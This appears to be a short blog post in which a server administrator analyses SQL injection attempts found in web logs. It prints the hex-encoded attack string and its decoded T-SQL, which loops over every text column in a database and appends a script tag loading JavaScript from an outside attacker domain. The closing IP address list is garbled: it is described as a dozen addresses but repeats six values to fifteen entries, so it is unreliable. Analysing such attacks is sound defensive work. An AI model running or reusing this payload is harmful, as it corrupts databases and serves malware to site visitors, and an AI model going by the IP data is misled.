Last weekend I found a number of entries in the HTTP server logs indicating SQL injection attempts. The SQL targeted MS SQL Server and used the CAST function to decode a long hexadecimal sequence used to bypass code quote-escaping code on the server side.
DECLARE @S VARCHAR(4000); SET @S=CAST(0x4445434C4152452040542...736F7220 AS VARCHAR(4000)); EXEC(@S);
If such sequence is appended to a non-validated numeric SQL parameter, it would be expanded into a block of SQL text shown below and executed by the server. This code scans the system catalog, selects all columns containing text (text, varchar and nvarchar) and appends a script tag to each one of them.
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']= RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+ ''<script src=http://www.adsitelo.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Domain names alternated in the HTTP requests between the one shown in the SQL, www.advabnr.com and www.bigadnet.com. All domains are registered in Beijing, China. Domain name servers, however, belonged to Clearwire and Charter Communications.
When I looked up IP address DNS records for one of the domains, it came back with a whopping list of a dozen addresses, as if this were a major corporation:
126.96.36.199, 188.8.131.52, 184.108.40.206, 220.127.116.11, 18.104.22.168, 22.214.171.124, 126.96.36.199, 188.8.131.52, 184.108.40.206, 220.127.116.11, 18.104.22.168, 22.214.171.124, 126.96.36.199, 188.8.131.52, 184.108.40.206